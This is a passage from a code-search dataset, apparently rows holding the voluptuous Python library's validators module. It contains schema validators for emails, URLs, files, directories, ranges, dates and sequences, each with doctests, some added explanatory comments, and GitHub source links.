raise FileInvalid('Not a file') | Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L429-L446 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
"""Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir')
"""
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
"""Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid)
"""
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
    """Parse *v* with urlparse and require both a scheme and a network
    location; return the parse result or raise UrlInvalid."""
    parsed = urlparse.urlparse(v)
    if not parsed.scheme or not parsed.netloc:
        raise UrlInvalid("must have a URL scheme and host")
    return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
    """Verify that the value is an Email or not.

    >>> s = Schema(Email())
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> s('t@x.com')
    't@x.com'
    """
    try:
        if not v or "@" not in v:
            raise EmailInvalid("Invalid Email")
        user_part, domain_part = v.rsplit('@', 1)
        if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
            raise EmailInvalid("Invalid Email")
        return v
    except (EmailInvalid, TypeError, AttributeError):
        # Narrowed from a bare ``except:`` which also swallowed
        # KeyboardInterrupt/SystemExit. ValueError is re-raised so the
        # @message decorator still produces EmailInvalid('expected an Email').
        raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
    """Verify that the value is a Fully qualified domain name URL.

    >>> s = Schema(FqdnUrl())
    >>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
    ...   s("http://localhost/")
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        parsed_url = _url_validation(v)
        if "." not in parsed_url.netloc:
            raise UrlInvalid("must have a domain name in URL")
        return v
    except (UrlInvalid, AttributeError, TypeError, ValueError):
        # Narrowed from a bare ``except:``; ValueError is re-raised so the
        # @message decorator produces the UrlInvalid error as before.
        raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
    """Verify that the value is a URL.

    >>> s = Schema(Url())
    >>> with raises(MultipleInvalid, 'expected a URL'):
    ...   s(1)
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        _url_validation(v)
        return v
    except (UrlInvalid, AttributeError, TypeError, ValueError):
        # Narrowed from a bare ``except:`` which also swallowed
        # KeyboardInterrupt/SystemExit; behaviour via @message is unchanged.
        raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
    """Verify the file exists.

    Restores the missing IsFile body: its two decorators were left stranded
    directly above IsDir, which both dropped this validator and stacked four
    decorators onto IsDir.

    >>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
    True
    >>> with raises(FileInvalid, 'not a file'):
    ...   IsFile()("random_filename_goes_here.py")
    >>> with raises(FileInvalid, 'Not a file'):
    ...   IsFile()(None)
    """
    try:
        if v:
            v = str(v)
            return os.path.isfile(v)
        else:
            raise FileInvalid('Not a file')
    except TypeError:
        raise FileInvalid('Not a file')


@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
    """Verify the directory exists.

    >>> IsDir()('/')
    '/'
    >>> with raises(DirInvalid, 'Not a directory'):
    ...   IsDir()(None)
    """
    try:
        if v:
            v = str(v)
            return os.path.isdir(v)
        else:
            raise DirInvalid("Not a directory")
    except TypeError:
        raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
    """Verify the path exists, regardless of its type.

    >>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
    True
    >>> with raises(Invalid, 'path does not exist'):
    ...   PathExists()("random_filename_goes_here.py")
    >>> with raises(PathInvalid, 'Not a Path'):
    ...   PathExists()(None)
    """
    try:
        if v:
            # Coerce to str so non-string path values are accepted.
            v = str(v)
            return os.path.exists(v)
        else:
            # Falsy input (None, '', ...) is rejected outright.
            raise PathInvalid("Not a Path")
    except TypeError:
        raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
    """Validate that the object matches given validator or is None.
    :raises Invalid: if the value does not match the given validator and is not
        None
    >>> s = Schema(Maybe(int))
    >>> s(10)
    10
    >>> with raises(Invalid):
    ...     s("string")
    """
    # None is tried first; anything else must satisfy the wrapped validator.
    return Any(None, validator, msg=msg)
class Range(object):
    """Limit a value to a range.
    Either min or max may be omitted.
    Either min or max can be excluded from the range of accepted values.
    :raises Invalid: If the value is outside the range.
    >>> s = Schema(Range(min=1, max=10, min_included=False))
    >>> s(5)
    5
    >>> s(10)
    10
    >>> with raises(MultipleInvalid, 'value must be at most 10'):
    ...     s(20)
    >>> with raises(MultipleInvalid, 'value must be higher than 1'):
    ...     s(1)
    >>> with raises(MultipleInvalid, 'value must be lower than 10'):
    ...     Schema(Range(max=10, max_included=False))(20)
    """

    def __init__(self, min=None, max=None, min_included=True,
                 max_included=True, msg=None):
        self.min = min
        self.max = max
        self.min_included = min_included
        self.max_included = max_included
        self.msg = msg

    def __call__(self, v):
        # Comparisons are written as ``not v >= bound`` (not ``v < bound``)
        # so values that fail every comparison (e.g. NaN) are rejected.
        low, high = self.min, self.max
        if low is not None:
            if self.min_included:
                if not v >= low:
                    raise RangeInvalid(
                        self.msg or 'value must be at least %s' % low)
            elif not v > low:
                raise RangeInvalid(
                    self.msg or 'value must be higher than %s' % low)
        if high is not None:
            if self.max_included:
                if not v <= high:
                    raise RangeInvalid(
                        self.msg or 'value must be at most %s' % high)
            elif not v < high:
                raise RangeInvalid(
                    self.msg or 'value must be lower than %s' % high)
        return v

    def __repr__(self):
        return ('Range(min=%r, max=%r, min_included=%r,'
                ' max_included=%r, msg=%r)' % (self.min, self.max,
                                               self.min_included,
                                               self.max_included,
                                               self.msg))
class Clamp(object):
    """Clamp a value to a range.
    Either min or max may be omitted.
    >>> s = Schema(Clamp(min=0, max=1))
    >>> s(0.5)
    0.5
    >>> s(5)
    1
    >>> s(-1)
    0
    """

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        # Never raises: out-of-range input is pulled to the nearest bound.
        lo, hi = self.min, self.max
        if lo is not None and v < lo:
            v = lo
        if hi is not None and v > hi:
            v = hi
        return v

    def __repr__(self):
        return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
    """The length of a value must be in a certain range."""

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        # len() is only evaluated when a bound is actually set, so
        # unbounded Length() accepts values without __len__.
        if self.min is not None and len(v) < self.min:
            raise LengthInvalid(
                self.msg or 'length of value must be at least %s' % self.min)
        if self.max is not None and len(v) > self.max:
            raise LengthInvalid(
                self.msg or 'length of value must be at most %s' % self.max)
        return v

    def __repr__(self):
        return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
    """Validate that the value matches the datetime format."""

    DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'

    def __init__(self, format=None, msg=None):
        self.format = format or self.DEFAULT_FORMAT
        self.msg = msg

    def __call__(self, v):
        # The parse result is discarded; only parseability is checked and
        # the original string is returned unchanged.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DatetimeInvalid(
                self.msg or 'value does not match'
                ' expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Datetime(format=%s)' % self.format
class Date(Datetime):
    """Validate that the value matches the date format."""

    DEFAULT_FORMAT = '%Y-%m-%d'

    def __call__(self, v):
        # Same check as Datetime, but raises DateInvalid instead.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DateInvalid(
                self.msg or 'value does not match'
                ' expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Date(format=%s)' % self.format
class In(object):
    """Validate that a value is in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        # Unhashable values make ``in`` raise TypeError for hashed
        # containers; treat that the same as "not found".
        try:
            missing = v not in self.container
        except TypeError:
            missing = True
        if missing:
            raise InInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'In(%s)' % (self.container,)
class NotIn(object):
    """Validate that a value is not in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        # An unhashable value is treated as a failure, mirroring In.
        try:
            present = v in self.container
        except TypeError:
            present = True
        if present:
            raise NotInInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'NotIn(%s)' % (self.container,)
class Contains(object):
    """Validate that the given schema element is in the sequence being validated.
    >>> s = Contains(1)
    >>> s([3, 2, 1])
    [3, 2, 1]
    >>> with raises(ContainsInvalid, 'value is not allowed'):
    ...     s([3, 2])
    """

    def __init__(self, item, msg=None):
        self.item = item
        self.msg = msg

    def __call__(self, v):
        # A non-container value makes ``in`` raise TypeError; treat it
        # the same as "item not present".
        try:
            absent = self.item not in v
        except TypeError:
            absent = True
        if absent:
            raise ContainsInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
    """Matches each element in a sequence against the corresponding element in
    the validators.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema
        constructors.
    >>> from voluptuous import Schema, ExactSequence
    >>> validate = Schema(ExactSequence([str, int, list, list]))
    >>> validate(['hourly_report', 10, [], []])
    ['hourly_report', 10, [], []]
    >>> validate(('hourly_report', 10, [], []))
    ('hourly_report', 10, [], [])
    """

    def __init__(self, validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        # Compile each positional validator into a Schema once, up front.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        # Must be a list/tuple of exactly the declared length.
        if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
            raise ExactSequenceInvalid(self.msg)
        try:
            checked = [schema(x) for x, schema in zip(v, self._schemas)]
        except Invalid as e:
            raise e if self.msg is None else ExactSequenceInvalid(self.msg)
        # Preserve the input's container type (list stays list, tuple tuple).
        return type(v)(checked)

    def __repr__(self):
        return 'ExactSequence([%s])' % (", ".join(repr(v)
                                                  for v in self.validators))
class Unique(object):
    """Ensure an iterable does not contain duplicate items.
    Only iterables convertable to a set are supported (native types and
    objects with correct __eq__).
    JSON does not support set, so they need to be presented as arrays.
    Unique allows ensuring that such array does not contain dupes.
    >>> s = Schema(Unique())
    >>> s([])
    []
    >>> s([1, 2])
    [1, 2]
    >>> with raises(Invalid, 'contains duplicate items: [1]'):
    ...     s([1, 1, 2])
    >>> with raises(Invalid, "contains duplicate items: ['one']"):
    ...     s(['one', 'two', 'one'])
    >>> with raises(Invalid, regex="^contains unhashable elements: "):
    ...     s([set([1, 2]), set([3, 4])])
    >>> s('abc')
    'abc'
    >>> with raises(Invalid, regex="^contains duplicate items: "):
    ...     s('aabbc')
    """

    def __init__(self, msg=None):
        self.msg = msg

    def __call__(self, v):
        try:
            distinct = set(v)
        except TypeError as e:
            raise TypeInvalid(
                self.msg or 'contains unhashable elements: {0}'.format(e))
        if len(distinct) == len(v):
            return v
        # Second pass only on failure: collect the actual duplicates for
        # the error message (set.add returns None, so the or-trick keeps
        # items already seen).
        seen = set()
        dupes = list(set(x for x in v if x in seen or seen.add(x)))
        raise Invalid(
            self.msg or 'contains duplicate items: {0}'.format(dupes))

    def __repr__(self):
        return 'Unique()'
class Equal(object):
    """Ensure that value matches target.
    >>> s = Schema(Equal(1))
    >>> s(1)
    1
    >>> with raises(Invalid):
    ...     s(2)
    Validators are not supported, match must be exact:
    >>> s = Schema(Equal(str))
    >>> with raises(Invalid):
    ...     s('foo')
    """

    def __init__(self, target, msg=None):
        self.target = target
        self.msg = msg

    def __call__(self, v):
        # Plain equality only; the target is never treated as a validator.
        if v != self.target:
            raise Invalid(
                self.msg or
                'Values are not equal: value:{} != target:{}'.format(
                    v, self.target))
        return v

    def __repr__(self):
        return 'Equal({})'.format(self.target)
class Unordered(object):
    """Ensures sequence contains values in unspecified order.
    >>> s = Schema(Unordered([2, 1]))
    >>> s([2, 1])
    [2, 1]
    >>> s([1, 2])
    [1, 2]
    >>> s = Schema(Unordered([str, int]))
    >>> s(['foo', 1])
    ['foo', 1]
    >>> s([1, 'foo'])
    [1, 'foo']
    """
    def __init__(self, validators, msg=None, **kwargs):
        # Pre-compile every validator into a Schema once, up front.
        self.validators = validators
        self.msg = msg
        self._schemas = [Schema(val, **kwargs) for val in validators]
    def __call__(self, v):
        if not isinstance(v, (list, tuple)):
            raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
        if len(v) != len(self._schemas):
            raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
        # Greedy one-to-one matching: each element consumes the first
        # still-unused schema that accepts it.
        # NOTE(review): greedy matching is order-sensitive and can reject
        # inputs that a full bipartite matching would accept -- existing
        # behavior, kept as-is.
        consumed = set()
        missing = []
        for index, value in enumerate(v):
            found = False
            for i, s in enumerate(self._schemas):
                if i in consumed:
                    continue
                try:
                    s(value)
                except Invalid:
                    pass
                else:
                    found = True
                    consumed.add(i)
                    break
            if not found:
                missing.append((index, value))
        # Single failure -> one Invalid; several -> MultipleInvalid.
        if len(missing) == 1:
            el = missing[0]
            raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
        elif missing:
            raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
                el[0], el[1])) for el in missing])
        return v
    def __repr__(self):
        return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
    """
    Verify the number of digits that are present in the number(Precision),
    and the decimal places(Scale)
    :raises Invalid: If the value does not match the provided Precision and Scale.
    >>> schema = Schema(Number(precision=6, scale=2))
    >>> schema('1234.01')
    '1234.01'
    >>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
    >>> schema('1234.01')
    Decimal('1234.01')
    """
    def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
        # precision: expected total count of significant digits
        # scale: expected count of digits after the decimal point
        # yield_decimal: return the parsed Decimal instead of the raw input
        self.precision = precision
        self.scale = scale
        self.msg = msg
        self.yield_decimal = yield_decimal
    def __call__(self, v):
        """
        :param v: is a number enclosed with string
        :return: Decimal number
        """
        precision, scale, decimal_num = self._get_precision_scale(v)
        # NOTE(review): this combined branch fires only when BOTH precision
        # and scale mismatch (``and``); single mismatches fall through to the
        # individual checks below -- existing behavior, kept as-is.
        if self.precision is not None and self.scale is not None and precision != self.precision\
            and scale != self.scale:
            raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
                                                                                                       self.scale))
        else:
            if self.precision is not None and precision != self.precision:
                raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
            if self.scale is not None and scale != self.scale:
                raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
        if self.yield_decimal:
            return decimal_num
        else:
            return v
    def __repr__(self):
        return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
    def _get_precision_scale(self, number):
        """
        :param number:
        :return: tuple(precision, scale, decimal_number)
        """
        try:
            decimal_num = Decimal(number)
        except InvalidOperation:
            raise Invalid(self.msg or 'Value must be a number enclosed with string')
        # precision = number of stored digits; scale = -exponent, e.g.
        # Decimal('1234.01') -> digits=6, exponent=-2 -> scale=2.
        return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
    """Value must pass at least some validations, determined by the given parameter.
    Optionally, number of passed validations can be capped.
    The output of each validator is passed as input to the next.
    :param min_valid: Minimum number of valid schemas.
    :param validators: a list of schemas or validators to match input against
    :param max_valid: Maximum number of valid schemas.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :raises NotEnoughValid: if the minimum number of validations isn't met
    :raises TooManyValid: if the more validations than the given amount is met
    >>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
    >>> validate(6.6)
    6.6
    >>> validate(3)
    3
    >>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
    ...     validate(6.2)
    """
    def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
        assert min_valid is not None or max_valid is not None, \
            'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
        # Omitted bounds default to the loosest possible limits.
        self.min_valid = min_valid or 0
        self.max_valid = max_valid or len(validators)
        super(SomeOf, self).__init__(*validators, **kwargs)
    def _exec(self, funcs, v, path=None):
        # Run every validator, threading each success's output into the
        # next call, and count how many passed.
        errors = []
        funcs = list(funcs)
        for func in funcs:
            try:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
            except Invalid as e:
                errors.append(e)
        passed_count = len(funcs) - len(errors)
        if self.min_valid <= passed_count <= self.max_valid:
            return v
        # Outside the allowed band: report all collected errors at once.
        msg = self.msg
        if not msg:
            msg = ', '.join(map(str, errors))
        if passed_count > self.max_valid:
            raise TooManyValid(msg)
        raise NotEnoughValid(msg)
    def __repr__(self):
        return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
            self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | IsDir | python | def IsDir(v):
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory") | Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L451-L466 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
# Python 2/3 compatibility shims: expose one ``urlparse`` module name and a
# ``basestring`` alias usable under both major versions.
if sys.version_info >= (3,):
    import urllib.parse as urlparse
    basestring = str
else:
    import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
# Local part of an email address: dot-atom or quoted-string form.
USER_REGEX = re.compile(
    # dot-atom
    r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
    r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
    # quoted-string
    r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
    r"""\\[\001-\011\013\014\016-\177])*"$)""",
    re.IGNORECASE
)
# Domain part: dotted hostname labels, or a bracketed IPv4 literal.
DOMAIN_REGEX = re.compile(
    # domain
    r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
    r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
    # literal form, ipv4 address (SMTP 4.1.3)
    r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
    r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
    re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
    """Convenience decorator to convert truth functions into validators.
    >>> @truth
    ... def isdir(v):
    ...     return os.path.isdir(v)
    >>> validate = Schema(isdir)
    >>> validate('/')
    '/'
    >>> with raises(MultipleInvalid, 'not a valid value'):
    ...     validate('/notavaliddir')
    """
    @wraps(f)
    def check(v):
        # A falsy predicate result becomes ValueError, which Schema turns
        # into Invalid ('not a valid value'); truthy passes v through.
        if not f(v):
            raise ValueError
        return v
    return check
class Coerce(object):
    """Coerce a value to a type.
    If the type constructor throws a ValueError or TypeError, the value
    will be marked as Invalid.
    Default behavior:
    >>> validate = Schema(Coerce(int))
    >>> with raises(MultipleInvalid, 'expected int'):
    ...     validate(None)
    >>> with raises(MultipleInvalid, 'expected int'):
    ...     validate('foo')
    With custom message:
    >>> validate = Schema(Coerce(int, "moo"))
    >>> with raises(MultipleInvalid, 'moo'):
    ...     validate('foo')
    """

    def __init__(self, type, msg=None):
        self.type = type
        self.msg = msg
        # Cached for the default error message and for __repr__.
        self.type_name = type.__name__

    def __call__(self, v):
        try:
            return self.type(v)
        except (ValueError, TypeError, InvalidOperation):
            raise CoerceInvalid(
                self.msg or 'expected %s' % self.type_name)

    def __repr__(self):
        return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
    """Assert that a value is true, in the Python sense.
    >>> validate = Schema(IsTrue())
    "In the Python sense" means that implicitly false values, such as empty
    lists, dictionaries, etc. are treated as "false":
    >>> with raises(MultipleInvalid, "value was not true"):
    ...     validate([])
    >>> validate([1])
    [1]
    >>> with raises(MultipleInvalid, "value was not true"):
    ...     validate(False)
    ...and so on.
    >>> try:
    ...     validate([])
    ... except MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], TrueInvalid)
    """
    # The @truth decorator performs the actual truthiness check; returning
    # v unchanged lets falsy inputs raise ValueError inside the wrapper,
    # which @message converts into TrueInvalid.
    return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
    """Assert that a value is false, in the Python sense.
    (see :func:`IsTrue` for more detail)
    >>> validate = Schema(IsFalse())
    >>> validate([])
    []
    >>> with raises(MultipleInvalid, "value was not false"):
    ...     validate(True)
    >>> try:
    ...     validate(True)
    ... except MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], FalseInvalid)
    """
    # Truthy input -> ValueError, converted to FalseInvalid by @message;
    # falsy input is returned unchanged.
    if v:
        raise ValueError
    return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
    """Convert human-readable boolean values to a bool.
